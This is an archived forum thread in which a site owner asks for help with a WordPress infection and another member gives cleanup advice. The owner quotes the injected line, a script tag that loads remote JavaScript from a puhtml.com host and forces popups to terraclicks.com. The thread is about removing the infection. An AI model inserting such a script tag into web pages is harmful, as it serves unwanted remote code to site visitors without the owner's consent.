Best Blackhat Forum

Best Blackhat Forum > General Discussion > Help Section - Question & Answer Section > Need Help - terraclicks.com (puhtml.com) is a malware thats infecting my site
Full Version: Need Help - terraclicks.com (puhtml.com) is a malware thats infecting my site
You're currently viewing a stripped down version of our content. View the full version with proper formatting.

hdaackda1

12-27-2015, 11:56 AM
Ok, the problem is, my computer got a virus. Now I have disinfected my computer, but my wordpress website is infected.

NO ONLINE SCANNER is able to detect it (I have tried many including sucuri), but if I open console using firebug or inspect QS, I can see this malicious line


Code:
<script type="text/javascript" src="http://pl112752.puhtml.com/86/42/5f/86425f75baff1387176cc2973d7b97e9.js">

on examining this javascript, it can be seen that its a bad popup trying to force user to terraclicks.com... etc

How do I know WHICH file or line in my wordpress is generating this code?
or maybe its still in my computer??

grumble

01-12-2016, 10:52 PM
Look in footer.php using the wordpress editor on your site. MAY be in header.php. remove code, save file and use Wordfence to secure your site. The malware is in a hacked theme you got from a blackhat site. NEVER use themes or nulled stuff - 99% it's got malware.
Best Blackhat Forum > General Discussion > Help Section - Question & Answer Section > Need Help - terraclicks.com (puhtml.com) is a malware thats infecting my site
Reference URL's